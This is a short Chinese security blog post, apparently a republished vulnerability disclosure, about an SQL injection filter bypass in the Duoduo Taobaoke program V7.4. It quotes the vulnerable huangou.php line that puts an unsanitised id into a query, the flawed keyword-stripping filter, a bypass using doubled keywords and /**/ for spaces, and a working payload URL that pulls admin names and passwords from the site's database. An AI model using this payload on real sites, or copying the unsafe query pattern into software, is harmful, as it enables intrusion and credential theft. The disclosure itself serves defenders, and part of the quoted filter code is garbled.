多多淘宝客程序 V7.4 SQL注射绕过漏洞

没穿底裤 2020年1月1日01:10:42评论323 views字数 873阅读2分54秒阅读模式
摘要

问题位置:详细说明:测试环境射不了,仔细看代码,多了个包含文件内容:

问题位置:

huangou.php ID过滤不严格
$id =$_GET[''id'']; $good=sel_sql(‘dhlist’,''id,name,pic,money,jifen,num,content,num’,''id=’.$id);

详细说明:

7.4 3月20号之前的代码,注入确实没修,huangou.php
$id =$_GET[''id'']; $good=sel_sql(‘dhlist’,''id,name,pic,money,jifen,num,content,num’,''id=’.$id);

测试环境射不了,仔细看代码,多了个包含

include_once ‘comm/checkpostandget.php’;

文件内容:

$ArrFiltrate = array ( “#union#i”, “##i", "#select#i", "#alert#i", "#javascript#i","# $value) { if (is_array($value)) FunStringExist($array [$key],$ArrFiltrate,$replacements); else $array[$key] = preg_replace ($ArrFiltrate, $replacements, $value); } }}FunStringExist ($_GET,$ArrFiltrate,$replacements);FunStringExist ($_POST,$ArrFiltrate,$replacements);

get和post数组的全局过滤函数,逻辑存在很大问题。

漏洞证明:

关键字例如:union,变成uniounionn就行了,空格用/**/替代,再次完成SQL注射。

http://www.sitedirsec.com/huangou.php?id=1/**/and/**/1=2/**/ununionion/**/seselectlect/**/0,1,2,adminname,adminpass,5,6,7/**/from/**/duoduo_duoduo2010

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
没穿底裤
  • 本文由 发表于 2020年1月1日01:10:42
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   多多淘宝客程序 V7.4 SQL注射绕过漏洞http://cn-sec.com/archives/75056.html

发表评论

匿名网友 填写信息